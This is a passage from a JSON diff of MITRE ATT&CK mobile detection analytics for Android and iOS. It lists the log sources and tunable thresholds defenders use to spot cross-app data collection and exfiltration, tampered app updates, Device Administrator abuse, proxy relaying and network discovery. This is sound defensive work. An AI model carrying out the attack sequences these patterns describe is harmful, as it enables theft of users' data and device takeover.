+                    "description": "Defender correlates an app escalating file visibility (permissions/flags, legacy storage modes) with enumeration of other apps\u2019 storage or exported ContentProviders, followed by bulk reads/copies from target paths (including shared/external storage) and optional archive/encode then share/upload. Sequence: storage capability/permission gain \u2192 target discovery (provider queries, directory listing) \u2192 high-volume cross-app data reads from writable/shared paths \u2192 archive/encode \u2192 exfil/share within a short window.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6",
+                            "name": "android:logcat",
+                            "channel": "Runtime grant or manifest presence for MANAGE_EXTERNAL_STORAGE/READ_EXTERNAL_STORAGE/READ_MEDIA_*; legacy external storage mode detection"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "android:logcat",
+                            "channel": "QUERY on exported ContentProviders of other packages (content://<other.pkg>/*) or MediaStore scoped queries immediately preceding file reads"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71",
+                            "name": "android:logcat",
+                            "channel": "READ or COPY operations where path matches external/shared locations of other apps (e.g., /storage/emulated/0/Android/data/<otherpkg>/files/, /storage/emulated/0/Download/<app>/*)"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                            "name": "android:logcat",
+                            "channel": "CREATE/WRITE of archive or container (.zip/.gz/.7z/.db copy) that aggregates files pulled from other-package paths"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindowSeconds",
+                            "description": "Correlation window to tie discovery \u2192 reads \u2192 package \u2192 exfil (e.g., 15\u2013120s)."
+                        },
+                        {
+                            "field": "ExternalStoragePathRegex",
+                            "description": "Regex for cross-app paths on external/shared storage to monitor."
+                        },
+                        {
+                            "field": "SuspiciousProviders",
+                            "description": "List of exported/weakly-protected content providers under scrutiny."
+                        },
+                        {
+                            "field": "MinBytesRead",
+                            "description": "Lower bound on cumulative read volume to avoid noisy single-file accesses."
+                        },
+                        {
+                            "field": "ArchiveExtensions",
+                            "description": "Extensions considered packaging (.zip,.gz,.7z,.tar,.db copies)."
+                        },
+                        {
+                            "field": "ExfilDomainAllowlist",
+                            "description": "Known good CDNs/APIs to reduce false positives."
+                        },
+                        {
+                            "field": "UserContext",
+                            "description": "Foreground/background, Work Profile, developer mode to scope alerts."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.379000+00:00\", \"old_value\": \"2026-01-29 17:51:41.189000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--b755f519-cc0c-44a4-865f-fa9ead44590f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.381000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0621#AN1684",
+                            "external_id": "AN1684"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1684",
+                    "description": "Defender correlates attempts to access other apps\u2019 data via shared containers (App Groups), Photos/Files providers, pasteboard abuse, or jailbroken cross-container reads, followed by aggregation/packaging and optional exfil/share. Sequence: capability/consent (TCC/entitlements) \u2192 target discovery (AppGroup/Photos/Files enumeration, URL schemes) \u2192 bulk read from shared/foreign container or provider \u2192 package/encode \u2192 exfil/share.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6",
+                            "name": "iOS:unifiedlog",
+                            "channel": "Privacy (TCC) prompts/grants for Photos/Files or access changes indicating new visibility into user/app data"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71",
+                            "name": "iOS:unifiedlog",
+                            "channel": "READ operations from App Group containers (/var/mobile/Containers/Shared/AppGroup/...) or Files/Photos provider mountpoints, especially when group not owned by bundle"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+                            "name": "iOS:unifiedlog",
+                            "channel": "Repeated or large UIPasteboard reads; background pasteboard access shortly before packaging"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                            "name": "iOS:unifiedlog",
+                            "channel": "CREATE/WRITE of archive/container (.zip/.gz/.7z/.db export) aggregating recently read items"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindowSeconds",
+                            "description": "Correlation window for consent/discovery \u2192 read \u2192 package \u2192 exfil (e.g., 20\u2013180s)."
+                        },
+                        {
+                            "field": "AppGroupAllowlist",
+                            "description": "Allowed App Group IDs for each bundle to reduce FPs."
+                        },
+                        {
+                            "field": "ProviderScope",
+                            "description": "Files/Photos provider collections permitted for the app."
+                        },
+                        {
+                            "field": "MinBytesRead",
+                            "description": "Lower bound on cumulative read size to signal collection vs casual access."
+                        },
+                        {
+                            "field": "ArchiveExtensions",
+                            "description": "Packaging extensions to track when aggregating data."
+                        },
+                        {
+                            "field": "ExfilDomainAllowlist",
+                            "description": "Known-good enterprise domains/CDNs for uploads."
+                        },
+                        {
+                            "field": "UserContext",
+                            "description": "Foreground/background and Work Profile state to scope analytics."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.381000+00:00\", \"old_value\": \"2026-01-29 18:00:59.178000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--5e90ac48-345b-445a-877f-596737ad7efb",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.378000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0626#AN1693",
+                            "external_id": "AN1693"
+                        },
+                        {
+                            "source_name": "Android_UnsafeURILoading_Sept2024",
+                            "description": "Android Developers. (2024, September 24). Webviews \u2013 Unsafe URI Loading. Retrieved March 2, 2026.",
+                            "url": "https://developer.android.com/privacy-and-security/risks/unsafe-uri-loading"
+                        },
+                        {
+                            "source_name": "Android-AppLinks",
+                            "description": "Android. (n.d.). Handling App Links. Retrieved December 21, 2016.",
+                            "url": "https://developer.android.com/training/app-links/index.html"
+                        },
+                        {
+                            "source_name": "IETF-OAuthNativeApps",
+                            "description": "W. Denniss and J. Bradley. (2017, October). IETF RFC 8252: OAuth 2.0 for Native Apps. Retrieved November 30, 2018.",
+                            "url": "https://tools.ietf.org/html/rfc8252"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1693",
+                    "description": "When vetting applications for potential security weaknesses, the vetting process could look for insecure use of Intents. Defenders should validate the entirety of the URI. For example, the URI's scheme should be `https` and the URI's host should be on a list of trusted hosts.(Citation: Android_UnsafeURILoading_Sept2024)\n\nDevelopers should be encouraged to use techniques to ensure that the intent can only be sent to an appropriate destination (e.g., use explicit rather than implicit intents, permission checking, checking of the destination app's signing certificate, or utilizing the App Links feature). For mobile applications using OAuth, encourage use of best practice.(Citation: IETF-OAuthNativeApps)(Citation: Android-AppLinks)\n\nOn Android, users may be presented with a popup to select the appropriate application to open the URI in. If the user sees an application they do not recognize, they can remove it.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962",
+                            "name": "Application Vetting",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4",
+                            "name": "User Interface",
+                            "channel": "None"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.378000+00:00\", \"old_value\": \"2026-03-02 20:08:42.566000+00:00\"}}}",
+                    "previous_version": "2.0"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--cbdcf6f3-00c3-4c38-bc7c-ffb6806f0a25",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.382000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0626#AN1694",
+                            "external_id": "AN1694"
+                        },
+                        {
+                            "source_name": "SecureAuth_iOSOAuth_2025",
+                            "description": "SecureAuth. (2025). Build an iOS App Using OAuth 2.0 and PKCE. Retrieved March 2, 2026.",
+                            "url": "https://docs.secureauth.com/ciam/en/build-an-ios-app-using-oauth-2-0-and-pkce.html"
+                        },
+                        {
+                            "source_name": "IETF-OAuthNativeApps",
+                            "description": "W. Denniss and J. Bradley. (2017, October). IETF RFC 8252: OAuth 2.0 for Native Apps. Retrieved November 30, 2018.",
+                            "url": "https://tools.ietf.org/html/rfc8252"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1694",
+                    "description": "When vetting applications for potential security weaknesses, the vetting process could look for insecure use of Intents. \n\nDevelopers should be encouraged to use techniques to ensure that the intent can only be sent to an appropriate destination (e.g., use explicit rather than implicit intents, permission checking, checking of the destination app's signing certificate, or utilizing the App Links feature). For mobile applications using OAuth, encourage use of best practice.(Citation: IETF-OAuthNativeApps)(Citation: SecureAuth_iOSOAuth_2025)",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962",
+                            "name": "Application Vetting",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4",
+                            "name": "User Interface",
+                            "channel": "None"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.382000+00:00\", \"old_value\": \"2026-03-02 20:11:59.312000+00:00\"}}}",
+                    "previous_version": "2.0"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--c1cdc6fb-9b7f-4076-9634-c939ddaef2bf",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.382000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0628#AN1697",
+                            "external_id": "AN1697"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1697",
+                    "description": "An app or app update arrives through an expected delivery path or presents as a known legitimate package identity, but its post-install or post-update behavior materially changes in ways inconsistent with its historical role. The defender correlates package identity and install/update context, newly expanded capability state, changed runtime framework use, new sensor or storage behaviors, and new network destinations shortly after installation or update to identify likely supply-chain compromise rather than ordinary malicious sideloading or unrelated post-compromise activity.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2",
+                            "name": "android:MDMLog",
+                            "channel": "Managed app catalog, enterprise update policy, or trusted distribution posture remains unchanged while a known app exhibits materially different post-update behavior"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "Known application or newly updated version declares, gains, or activates expanded storage, sensor, communications, accessibility, or device-management capability inconsistent with prior baseline or app role"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Updated or newly delivered application becomes active, launches background services, or executes shortly after install/update with minimal user interaction inconsistent with baseline"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Known application begins first-seen or expanded use of content providers, account services, accessibility, package services, cryptographic routines, dynamic loading, or other framework interactions after update/install"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Maximum span between app install/update event and first suspicious post-delivery behavior."
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Approved apps expected to change permissions, add services, or contact new destinations because of legitimate feature releases."
+                        },
+                        {
+                            "field": "AllowedVersionChangeWindow",
+                            "description": "Grace period after a documented app release during which some behavior drift may be expected."
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Whether certain behaviors should only be considered suspicious when they occur without visible user interaction."
+                        },
+                        {
+                            "field": "RecentUserInteractionWindow",
+                            "description": "Threshold for determining whether immediate post-update activity was user-driven or autonomous."
+                        },
+                        {
+                            "field": "DestinationAllowList",
+                            "description": "Expected new destinations, APIs, CDNs, or telemetry endpoints associated with approved app updates."
+                        },
+                        {
+                            "field": "CapabilityDriftThreshold",
+                            "description": "Threshold for how many newly added or newly exercised permissions/capabilities are considered abnormal for a known app."
+                        },
+                        {
+                            "field": "BehaviorBaselinePopulation",
+                            "description": "Population of prior devices, versions, or user cohorts used to baseline normal app behavior."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.382000+00:00\", \"old_value\": \"2026-03-12 17:37:17.976000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--9aa716a2-0301-49cd-89c0-a441e5da0551",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.380000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0628#AN1698",
+                            "external_id": "AN1698"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1698",
+                    "description": "A managed or supervised app, app update, or enterprise-distributed build retains a legitimate-seeming identity but exhibits post-delivery behavior inconsistent with its expected role, prior version, or distribution context. Because iOS exposes less direct visibility into bundled dependency tampering or component-level supply-chain insertion, the defender prioritizes supervised app inventory, signing/provisioning trust posture, entitlement and behavior drift after update, new sensor/resource use, and new downstream network effects soon after install or version change.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2",
+                            "name": "iOS:MDMLog",
+                            "channel": "Managed app distribution, supervised install posture, or provisioning trust context remains expected while a known app exhibits materially different behavior after version change"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "iOS:MDMLog",
+                            "channel": "Known application version declares, activates, or exhibits new entitlements, privacy permissions, or capability use inconsistent with prior baseline or business role"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Updated or newly delivered application wakes, foregrounds, refreshes, or becomes active shortly after version change with weak recent user interaction"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Known application begins first-seen or expanded use of protected frameworks, account services, background task APIs, crypto/network service APIs, or other runtime behaviors after update/install"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Maximum span between app install/version change and first suspicious post-delivery behavior."
+                        },
+                        {
+                            "field": "SupervisedOnly",
+                            "description": "Whether the analytic should only apply to supervised devices with high-confidence app inventory and managed distribution telemetry."
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Approved apps expected to expand capabilities or contact new destinations because of legitimate releases."
+                        },
+                        {
+                            "field": "AllowedVersionChangeWindow",
+                            "description": "Grace period after approved releases during which some behavior drift may be expected."
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Whether certain behaviors should only be treated as suspicious when they occur without expected visible user interaction."
+                        },
+                        {
+                            "field": "RecentUserInteractionWindow",
+                            "description": "Threshold for distinguishing autonomous post-update behavior from expected user-driven first-run flows."
+                        },
+                        {
+                            "field": "DestinationAllowList",
+                            "description": "Expected new domains, APIs, telemetry services, or CDNs associated with approved app updates."
+                        },
+                        {
+                            "field": "CapabilityDriftThreshold",
+                            "description": "Threshold for how much entitlement or capability drift is tolerated for a known app."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.380000+00:00\", \"old_value\": \"2026-03-13 23:37:57.341000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--6852479f-7c3d-4c69-82b9-b5b9976e4101",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.378000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0630#AN1701",
+                            "external_id": "AN1701"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1701",
+                    "description": "Correlates (1) activation of Device Administrator privileges by an application, (2) absence or mismatch of legitimate user interaction during the approval flow, and (3) immediate execution of administrator-level control actions (e.g., password reset, device lock, policy enforcement, prevention of uninstall). The defender observes a causal chain where an application transitions into a privileged device control role and rapidly exercises those capabilities outside expected user-driven patterns.\n\nApplication vetting services can check for the string `BIND_DEVICE_ADMIN` in the application\u2019s manifest. ",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes DevicePolicyManager APIs (e.g., resetPassword, lockNow, setCameraDisabled) immediately following admin activation"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "application granted Device Administrator privilege + abnormal activation pattern (e.g., rapid enablement after install or no recent user interaction)"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Defines correlation window between Device Admin activation and subsequent privileged actions"
+                        },
+                        {
+                            "field": "AllowedAdminApps",
+                            "description": "Baseline of legitimate applications expected to request Device Administrator privileges (e.g., enterprise MDM agents)"
+                        },
+                        {
+                            "field": "UserInteractionThreshold",
+                            "description": "Defines acceptable timing between user interaction and admin activation"
+                        },
+                        {
+                            "field": "PrivilegedActionSet",
+                            "description": "List of high-risk DevicePolicyManager API actions monitored for abuse"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.378000+00:00\", \"old_value\": \"2026-04-13 18:17:45.586000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--cb78ff0f-6f8a-41a8-a199-4660a0addec9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.382000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0631#AN1702",
+                            "external_id": "AN1702"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1702",
+                    "description": "The defender correlates proxy-capable network setup or socket-handling behavior with subsequent bidirectional traffic relaying through the same device and app context, especially when inbound client sessions are followed by outbound connections to unrelated remote destinations or when the device sustains multiplexed traffic patterns inconsistent with normal mobile app workflows. The analytic prioritizes Android-observable effects: proxy or raw-socket setup, app background execution, inbound-to-outbound traffic bridging, and sustained relayed flows to multiple destinations without recent user interaction.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application initializes proxy-capable or raw-socket networking constructs, including SOCKS-capable Proxy API usage or direct socket listener/setup immediately before traffic relay phase"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "Managed app without approved VPN, enterprise tunneling, browser, or remote-access role exhibits proxy-like traffic handling inconsistent with policy baseline"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a",
+                            "name": "NSM:Flow",
+                            "channel": "App-attributed traffic exhibits multi-destination fan-out, sustained session bridging, or SOCKS-like relay behavior inconsistent with normal client-only mobile communication"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "NSM:Flow",
+                            "channel": "Device shows correlated inbound session establishment followed by outbound connections to separate external destinations with overlapping timing and relay-like byte symmetry"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between proxy/socket setup and subsequent inbound-outbound traffic bridging"
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Apps legitimately expected to proxy or tunnel traffic, such as enterprise VPN, remote access, security testing, or managed browser apps"
+                        },
+                        {
+                            "field": "AllowedDestinationList",
+                            "description": "Approved remote destinations or service categories for legitimate tunneling applications"
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Whether proxy-capable or relayed traffic should occur only during active user-driven workflows"
+                        },
+                        {
+                            "field": "RelaySessionThreshold",
+                            "description": "Minimum number of correlated inbound and outbound session pairs required to indicate relay behavior"
+                        },
+                        {
+                            "field": "ByteSymmetryTolerance",
+                            "description": "Allowed variance between inbound and outbound byte volumes when identifying proxied traffic"
+                        },
+                        {
+                            "field": "ConcurrentDestinationThreshold",
+                            "description": "Maximum expected number of simultaneous unrelated remote destinations for a legitimate app"
+                        },
+                        {
+                            "field": "UplinkBytesThreshold",
+                            "description": "Minimum outbound volume required for relay behavior to be considered meaningful"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.382000+00:00\", \"old_value\": \"2026-04-09 17:33:41.747000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--f44bab9b-554c-4dc7-b57f-4011ce609c2b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.384000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0634#AN1706",
+                            "external_id": "AN1706"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1706",
+                    "description": "Defender observes an app (package/UID) repeatedly retrieving network interface configuration attributes (local IP/MAC/interface names, active network capabilities, link properties, proxy/DNS settings, or carrier identifiers when permitted) in a short time window, without corresponding user network-management activity. The pattern is characterized by OS API execution for interface/config reads combined with background state, permission/role context (e.g., device owner/profile owner/carrier/default-SMS), and optional follow-on connectivity tests (gateway/DNS/proxy reachability). Correlate across API execution + app state + (optional) local probe to identify automated network configuration discovery rather than routine connectivity checks.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "Application Vetting",
+                            "channel": "None"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindowSeconds",
+                            "description": "Window to correlate config reads with app state and optional connectivity tests (e.g., 30\u2013300s)."
+                        },
+                        {
+                            "field": "MinConfigReadEvents",
+                            "description": "Minimum number of network-config read signals before flagging (environment dependent; e.g., \u226510/5m)."
+                        },
+                        {
+                            "field": "BackgroundOnly",
+                            "description": "If true, require the app to be backgrounded to reduce legitimate network UI/diagnostic activity."
+                        },
+                        {
+                            "field": "AllowlistedPackages",
+                            "description": "Connectivity/security/MDM apps expected to query network configuration frequently."
+                        },
+                        {
+                            "field": "PrivilegedRoleFilter",
+                            "description": "If true, elevate severity when an app with device-owner/profile-owner/carrier roles performs bursts."
+                        },
+                        {
+                            "field": "LocalProbePorts",
+                            "description": "Ports considered 'connectivity tests' (e.g., 53, 80, 443, 8080, 3128) \u2013 tune per environment."
+                        },
+                        {
+                            "field": "NetworkChangeSuppressionSeconds",
